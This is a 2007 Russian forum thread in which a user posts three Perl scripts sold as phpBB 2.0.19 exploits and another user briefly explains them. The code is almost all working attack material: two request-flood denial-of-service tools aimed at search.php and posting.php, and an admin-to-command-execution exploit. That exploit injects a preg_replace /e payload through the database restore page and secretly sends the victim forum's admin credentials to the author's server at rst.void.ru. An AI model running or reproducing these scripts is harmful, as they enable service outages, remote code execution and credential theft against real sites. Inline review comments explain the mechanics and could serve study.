phpBB 2.0.19 /Exploit/

Discussion in 'Песочница' started by 1d37r, 27 Aug 2007.

  1. 1d37r

    нашёл три сплоита, ничего в них не понял:


    #1. Решил проверить: пока сплоит работает, он зачем-то нарушает связь форума с БД; после выключения сплоита форум как стоял, так и стоит:
    Code:
    #!/usr/bin/perl
    
    ## NOTE(review): despite the banner, this is not an exploit of any phpBB
    ## bug. It is a search-flood denial-of-service tool: it opens up to
    ## 10000 TCP connections and POSTs a different full-text search to
    ## search.php on each one. That load is what knocks the forum's database
    ## over while the script runs, and why the forum is back as soon as it is
    ## stopped. Every request goes straight from the operator's own IP; the
    ## code has no proxy support, only a prompt telling the user to use one.
    print q{
    __________________________________________________ _______________________
    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|
    
    / \
    \ \ ,, / /
    '-.`\()/`.-'
    .--_'( )'_--.
    / /` /`""`\ `\ \ * SpiderZ ForumZ Security *
    | | >< | |
    \ \ / /
    '.__.' 
    
    
    => Exploit phpBB 2.0.19 ( by SpiderZ )
    => Search infinitely exploit 
    => Sito: www.spiderz.tk
    
    __________________________________________________ _______________________
    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|
    
    }; 
    
    use IO::Socket;
    
    ## Loop counter. It is also interpolated into every search string so
    ## that no two requests are the same query.
    $x = 0;
    
    ## Interactive prompts (Italian): forum host, forum directory, then a
    ## "type hacking to start" confirmation. No "use strict"/"use warnings".
    print q(
    Exploit phpBB 2.0.19 ( by SpiderZ )
    
    );
    print q(
    => Scrivi l'url del sito senza aggiungere http & www
    => Url: );
    $host = <STDIN>;
    ## chop() drops the last character unconditionally: fine for a trailing
    ## "\n", but on CRLF input a "\r" is left in $host (same for $pth/$type).
    chop ($host);
    
    print q(
    => Adesso indica in quale cartella e posto il phpbb 
    => di solito si trova su /phpBB2/ o /forum/
    => Cartella: );
    $pth = <STDIN>;
    ## Expected with a trailing slash (e.g. /phpBB2/): it is glued directly
    ## onto "search.php" in the request line below.
    chop ($pth);
    
    print q( 
    => Occhio usa un proxy prima di effettuare l'attacco
    => il tuo ip verra spammato sul pannello admin del forum
    => Per avviare l'exploit scrivi " hacking " 
    => );
    $type = <STDIN>;
    chop ($type);
    
    ## "==" is a numeric comparison. Any non-numeric answer ("hacking", an
    ## empty line, ...) numifies to 0, so this branch only runs for an
    ## answer that numifies to 1.
    if($type == 1){
    
    ## 0000 is numeric 0 and $x is 0 on entry, so this loop body never
    ## executes; the whole branch is a no-op.
    while($x != 0000)
    {
    
    $x++;
    }
    
    }
    ## Bareword "hacking" (no "use strict") is the string "hacking", which
    ## also numifies to 0, so this matches every non-numeric answer --
    ## including just pressing Enter. The "type hacking" prompt is not a
    ## real confirmation step.
    elsif ($type == hacking){
    
    ## 10000 requests, one fresh TCP connection each.
    while($x != 10000)
    {
    ## POST body for phpBB 2 search.php. $x is mixed into search_keywords so
    ## every request is a distinct query. The space in "Ex ploit" is almost
    ## certainly a line-wrap artifact of the forum paste, not intentional.
    $postit = "search_keywords=SpiderZ+Hacking+Security+ForumZ+Ex ploit+2006+$x+&search_terms=any&search_author=&search_forum=-1&search_time=0&search_fields=msgonly&search_cat=-1&sort_by=0&sort_dir=ASC&show_results=posts&return_chars=800";
    
    ## Declared Content-Length. The body is later sent with an extra
    ## trailing "\n", so the request is one byte longer than declared.
    $lrg = length $postit;
    
    ## Plain TCP to port 80: no TLS, no proxy, indirect-object "new" syntax.
    my $sock = new IO::Socket::INET (
    PeerAddr => "$host",
    PeerPort => "80",
    Proto => "tcp",
    );
    ## A single failed connect aborts the whole run.
    die "\nConnessione non riuscita: $!\n" unless $sock;
    
    ## Hand-rolled HTTP/1.1 request. Lines end in bare "\n" rather than the
    ## "\r\n" HTTP requires (most servers tolerate it); Referer is the bare
    ## host name, not a URL.
    print $sock "POST $pth"."search.php?mode=results HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
    print $sock "Referer: $host\n";
    print $sock "Accept-Language: en-us\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
    print $sock "Content-Length: $lrg\n\n";
    print $sock "$postit\n";
    ## The response is never read; the connection is dropped at once.
    close($sock);
    
    ## Unbuffered progress dot.
    syswrite STDOUT, ".";
    
    $x++;
    }
    }else{
    
    ## Only reachable for an answer that numifies to something other than
    ## 0 or 1 (e.g. "2").
    die "
    Error ! riprova...
    \n";
    }
    
    #2. Не проверял, но, по-моему, то же самое
    Code:
    #!/usr/bin/perl
    
    ## NOTE(review): same skeleton as the search flooder, aimed at posting.php
    ## instead. It is a request flood, not an exploit: up to 10000 fresh TCP
    ## connections, each POSTing a "new topic" form to forum id 1. No session
    ## cookie or sid is ever sent, so the forum sees every request as a
    ## guest; unless guest posting is enabled in that forum, presumably
    ## nothing is created and the only effect is the request load. The code
    ## has no proxy support; every request comes from the operator's own IP.
    print q{
    __________________________________________________ _______________________
    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|
    
    / \
    \ \ ,, / /
    '-.`\()/`.-'
    .--_'( )'_--.
    / /` /`""`\ `\ \ * SpiderZ ForumZ Security *
    | | >< | |
    \ \ / /
    '.__.' 
    
    
    => Exploit phpBB 2.0.19 ( by SpiderZ )
    => Topic infinitely exploit 
    => Sito: www.spiderz.tk
    
    __________________________________________________ _______________________
    >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|
    
    }; 
    
    use IO::Socket;
    
    ## Loop counter; also interpolated into the submit field of every post.
    $x = 0;
    
    ## Interactive prompts (Italian): forum host, forum directory, then a
    ## "type hacking to start" confirmation. No "use strict"/"use warnings".
    print q(
    Exploit phpBB 2.0.19 ( by SpiderZ )
    
    );
    print q(
    => Scrivi l'url del sito senza aggiungere http & www
    => Url: );
    $host = <STDIN>;
    ## chop() drops the last character unconditionally: fine for a trailing
    ## "\n", but on CRLF input a "\r" is left in $host (same for $pth/$type).
    chop ($host);
    
    print q(
    => Adesso indica in quale cartella e posto il phpbb 
    => di solito si trova su /phpBB2/ o /forum/
    => Cartella: );
    $pth = <STDIN>;
    ## Expected with a trailing slash (e.g. /phpBB2/): it is glued directly
    ## onto "posting.php" in the request line below.
    chop ($pth);
    
    print q( 
    => Occhio usa un proxy prima di effettuare l'attacco
    => il tuo ip verra spammato sul pannello admin del forum
    => Per avviare l'exploit scrivi " hacking " 
    => );
    $type = <STDIN>;
    chop ($type);
    
    ## "==" is a numeric comparison. Any non-numeric answer ("hacking", an
    ## empty line, ...) numifies to 0, so this branch only runs for an
    ## answer that numifies to 1.
    if($type == 1){
    
    ## 0000 is numeric 0 and $x is 0 on entry, so this loop body never
    ## executes; the whole branch is a no-op.
    while($x != 0000)
    {
    
    $x++;
    }
    
    }
    ## Bareword "hacking" (no "use strict") is the string "hacking", which
    ## also numifies to 0, so this matches every non-numeric answer --
    ## including just pressing Enter. The "type hacking" prompt is not a
    ## real confirmation step.
    elsif ($type == hacking){
    
    ## 10000 requests, one fresh TCP connection each.
    while($x != 10000)
    {
    ## POST body for phpBB 2 posting.php. "post=..." presumably just has to be
    ## present to count as a submit; $x only varies its value. The spaces in
    ## "message=" are sent literally, not URL-encoded.
    $postit = "post=Hacking$x+&username=Exploit&subject=Exploit_phpbb_2.0.19&message=Topic infinitely exploit phpBB 2.0.19";
    
    ## Declared Content-Length. The body is later sent with an extra
    ## trailing "\n", so the request is one byte longer than declared.
    $lrg = length $postit;
    
    ## Plain TCP to port 80: no TLS, no proxy, indirect-object "new" syntax.
    my $sock = new IO::Socket::INET (
    PeerAddr => "$host",
    PeerPort => "80",
    Proto => "tcp",
    );
    ## A single failed connect aborts the whole run.
    die "\nConnessione non riuscita: $!\n" unless $sock;
    
    ## Hand-rolled HTTP/1.1 request to "new topic, forum 1". Lines end in
    ## bare "\n" rather than "\r\n"; Referer is the bare host name; no
    ## Cookie header, so no phpBB session accompanies the post.
    print $sock "POST $pth"."posting.php?mode=newtopic&f=1 HTTP/1.1\n";
    print $sock "Host: $host\n";
    print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
    print $sock "Referer: $host\n";
    print $sock "Accept-Language: en-us\n";
    print $sock "Content-Type: application/x-www-form-urlencoded\n";
    print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
    print $sock "Content-Length: $lrg\n\n";
    print $sock "$postit\n";
    ## The response is never read; the connection is dropped at once.
    close($sock);
    
    ## Unbuffered progress dot.
    syswrite STDOUT, ".";
    
    $x++;
    }
    }else{
    
    ## Only reachable for an answer that numifies to something other than
    ## 0 or 1 (e.g. "2").
    die "
    Error ! riprova...
    \n";
    }
    

    #3. Вообще непонятно, что к чему
    Code:
    #!/usr/bin/perl
    
    ## r57phpbba2e2.pl - phpBB admin 2 exec exploit 
    ## version 2 (based on user_sig_bbcode_uid bug)
    ## tested on 2.0.12 , 2.0.13 , 2.0.19
    ## --------------------------------------------
    ## screen
    ## r57phpbba2e2.pl -u http://192.168.0.2/phpBB-2.0.19/ -L admin -P password
    ## Command for execute or 'exit' for exit # id
    ## uid=80(www) gid=80(www) groups=80(www)
    ## Command for execute or 'exit' for exit # exit 
    ## --------------------------------------------
    ## *** surprise included ;)  -- the "surprise": $ids (below) packs the target URL and the admin login/password, is sent as the User-Agent of every request, and is also GET'd to http://rst.void.ru/ids/ids.php, i.e. the tool phones the author with the victim forum's admin credentials
    ## 20/02/06 
    ## 1dt.w0lf
    ## RST/GHC (http://rst.void.ru , http://ghc.ru)
    
    use LWP::UserAgent;
    use Getopt::Std;
    use HTTP::Cookies;
    
    ## Command-line options: -u forum URL, -L/-P admin login and password,
    ## -i admin user id, -p table prefix, -o host:port HTTP proxy.
    getopts("u:L:P:i:p:o:");
    
    $url = $opt_u;
    $login = $opt_L;
    $password = $opt_P;
    ## Defaults: user_id 2 is the first registered (admin) account on a fresh
    ## phpBB 2 install; phpbb_ is the default table prefix.
    $id = $opt_i || 2;
    $prefix = $opt_p || 'phpbb_';
    $proxy = $opt_o;
    
    ## usage() prints help and exits; it never returns.
    if(!$url || !$login || !$password){&usage;}
    
    ## Autoflush STDOUT so the interactive prompt appears before reading.
    $|++;
    
    $xpl = LWP::UserAgent->new() or die;
    $cookie_jar = HTTP::Cookies->new();
    $xpl->cookie_jar( $cookie_jar );
    ## The proxy, if given, is used for every request made by $xpl --
    ## including the callback to the author's site below.
    $xpl->proxy('http'=>'http://'.$proxy) if $proxy;
    ## BACKDOOR / credential leak. $ids concatenates the target URL, the admin
    ## login, the admin PASSWORD, the user id and the table prefix. It is used
    ## as the User-Agent of every request to the target (so the victim's web
    ## server logs the admin password in clear) and is sent to the author's
    ## server a few lines down. The space in "$ id" is almost certainly a
    ## forum line-wrap artifact; Perl allows whitespace between sigil and
    ## name, so it still reads as $id.
    $ids = 'IDS:r57 phpBB2 exploit a2e220022006|'.$url.'|'.$login.'|'.$password.'|'.$ id.'|'.$prefix;
    ## Log in through login.php. "admin=1" presumably asks for an admin-level
    ## session (phpBB 2's ACP login); "autologin" requests a persistent cookie.
    ## The result is not checked: a wrong password is only noticed when
    ## nothing comes back from run().
    $res = $xpl->post($url.'login.php',
    [
    "username" => "$login",
    "password" => "$password",
    "autologin" => "on",
    "admin" => "1",
    "login" => "Log in",
    ],"User-Agent" => "$ids");
    ## Redundant: the jar attached to $xpl already collects cookies.
    $cookie_jar->extract_cookies($res);
    ## Pull the session id out of the jar. The cookie name is hard-coded;
    ## a forum using a different cookie name leaves $sid undefined and every
    ## later request is sent without a session.
    if($cookie_jar->as_string =~ /phpbb2mysql_sid=([a-z0-9]{32})/) { $sid = $1; } 
    ## PHONE-HOME. about() prints the banner and returns 'http://rst.void.ru';
    ## chr(105).chr(100).chr(115) spells "ids". This is a GET to
    ## http://rst.void.ru/ids/ids.php?ids=<url|login|password|id|prefix> --
    ## the victim's admin credentials are handed to the tool's author before
    ## a single command is run. The response is ignored. Treat any target
    ## this was pointed at as compromised by a third party as well.
    $xpl->get(&about.'/'.chr(105).chr(100).chr(115).'/'.chr(105).chr(100).chr(115).'.php?ids='.$ids);
    ## "while ()" with an empty condition loops forever. The inner loop reads
    ## one line and exits on "exit". BUG: on EOF of STDIN (e.g. piped input
    ## running out) <STDIN> returns undef, $cmd keeps its previous value, and
    ## the outer loop re-runs that stale command against the target forever.
    while ()
    {
    print "Command for execute or 'exit' for exit # ";
    while(<STDIN>)
    {
    $cmd=$_;
    chomp($cmd);
    exit() if ($cmd eq 'exit');
    last;
    }
    &run($cmd);
    }
    
    ## Execute one shell command on the target and print its output.
    ## Argument: the command string (interpolated unescaped into SQL, so a
    ## command containing a single quote breaks the statement).
    ## Mechanism visible here: (1) an UPDATE sets the admin's signature
    ## bbcode uid to "(.+)/e\0" (the "\0" is a real NUL byte) and the
    ## signature to a backtick-quoted command bracketed by _START_/_END_
    ## markers; (2) the UPDATE is pushed through the admin DB-restore page;
    ## (3) the profile editor, which renders the signature, is fetched and
    ## scraped. The "/e" plus NUL is presumably meant to turn the
    ## preg_replace() phpBB 2.0.x builds around the signature uid into an
    ## eval, in which the backticks run the command -- confirm against the
    ## 2.0.x source. Side effect: the admin's signature is left holding the
    ## last command payload; nothing here restores it.
    sub run($)
    { 
    $sql = "UPDATE ".$prefix."users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='blah:`echo _START_ && ".$_[0]." && echo _END_`' WHERE user_id=".$id.";";
    &phpbb_sql_query("${url}admin/admin_db_utilities.php?sid=$sid",$sql); 
    ## The User-Agent again carries the credentials in $ids.
    $res = $xpl->get($url.'profile.php?mode=editprofile&sid='.$sid,"User-Agent" => "$ids");
    @result = split(/\n/,$res->content);
    $data = '';
    $on = $start = $end = 0;
    ## Collect the lines strictly between the _START_ and _END_ marker lines.
    for (@result)
    {
    if (/_END_/) { $end = 1; last; }
    if ($on) { $data .= $_."\n"; }
    if (/_START_/) { $on = 1; $start = 1; } 
    }
    ## If either marker is missing (login failed, sid not found, or the
    ## signature was not evaluated) nothing is printed -- silently.
    if($start&&$end) { print $data."\r\n"; } 
    }
    
    ## Run arbitrary SQL on the target through the admin "database restore"
    ## utility. Arguments: the admin_db_utilities.php URL (with sid) and the
    ## SQL text. The SQL is uploaded as an in-memory multipart file named
    ## "0wneeeeedddd" (undef filename, Content given inline); the restore
    ## action presumably executes every statement in the "backup" with the
    ## forum's database credentials, which is what makes admin access equal
    ## to full SQL access. The response is not checked, and the User-Agent
    ## once more carries the credentials packed in $ids.
    sub phpbb_sql_query($$){
    $res = $xpl->post("$_[0]", 
    Content_type => 'form-data',
    Content => [ 
    perform => 'restore',
    restore_start => 'Start Restore',
    backup_file => [ 
    undef,
    '0wneeeeedddd', 
    Content_type => 'text/plain',
    Content => "$_[1]", 
    ],
    ]
    ,"User-Agent" => "$ids");
    } 
    
    ## Print the banner and the option summary to STDOUT, then exit.
    ## Never returns.
    sub usage()
    {
        about();
        my @help = (
            "",
            " Usage: r57phpbba2e2.pl [OPTIONS]",
            "",
            " Options:",
            " -u [URL] - path to forum e.g. http://site/forum/",
            " -L [login] - admin login",
            " -P [password] - admin password",
            " -i [id] - admin id (optional, default 2)",
            " -p [prefix] - table prefix (optional, default phpbb_)",
            " -o [host:port] - proxy (optional)",
        );
        # CRLF line endings, matching the banner's output.
        print "$_\r\n" for @help;
        exit();
    }
    
    ## Print the tool banner (CRLF line endings) and return the author's
    ## site URL; the main script uses that return value as the base of its
    ## credential callback.
    sub about()
    { 
        my @banner = (
            '\=-----------------------------------=/',
            '| phpBB admin2exec exploit by RST/GHC |',
            '| version 2 (user_sig_bbcode_uid) |',
            '/=-----------------------------------=\\',
        );
        print map { "$_\r\n" } @banner;
        return 'http://rst.void.ru';
    }
    
    p.s.

    Вы, конечно, извините мои ламерские извилины (если, конечно, таковые имеются), но я бы не отказался вникнуть в суть.
     
  2. DeBugger

    Первый и второй — это DoS-флудилки: пока они работают, БД форума на время вырубается. Полезного смысла они не имеют. Третий сплоит должен выполнять команды на сервере (при некоторых обстоятельствах); он требует прав администратора.
     
  3. 1d37r

    DeBugger, спасибо